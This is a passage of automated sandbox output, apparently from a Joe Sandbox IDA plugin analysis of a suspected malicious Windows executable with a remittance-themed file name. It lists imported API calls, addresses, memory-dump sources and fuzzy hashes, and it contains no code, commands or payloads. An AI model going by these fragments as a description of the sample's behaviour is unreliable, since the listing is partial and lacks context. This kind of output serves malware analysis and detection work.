                                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                                      • API String ID: 2574300362-58917771
                                                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                      • API String ID: 2574300362-1816364905
                                                                      • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                      • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                      • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                      • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                      • __itow.LIBCMT ref: 004699CD
                                                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                      • __itow.LIBCMT ref: 00469A97
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                      APIs
                                                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 004503C8
                                                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Proc$Parent
                                                                      • String ID:
                                                                      • API String ID: 2351499541-0
                                                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                      • TranslateMessage.USER32(?), ref: 00442B01
                                                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                      • String ID:
                                                                      • API String ID: 1795658109-0
                                                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                      • GetCaretPos.USER32(?), ref: 004743B2
                                                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                      • GetForegroundWindow.USER32 ref: 004743EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                      APIs
                                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                      • _wcslen.LIBCMT ref: 00449519
                                                                      • _wcslen.LIBCMT ref: 00449526
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen$_wcspbrk
                                                                      • String ID:
                                                                      • API String ID: 2886238975-0
                                                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __setmode$DebugOutputString_fprintf
                                                                      • String ID:
                                                                      • API String ID: 1792727568-0
                                                                      • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                      • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                      APIs
                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
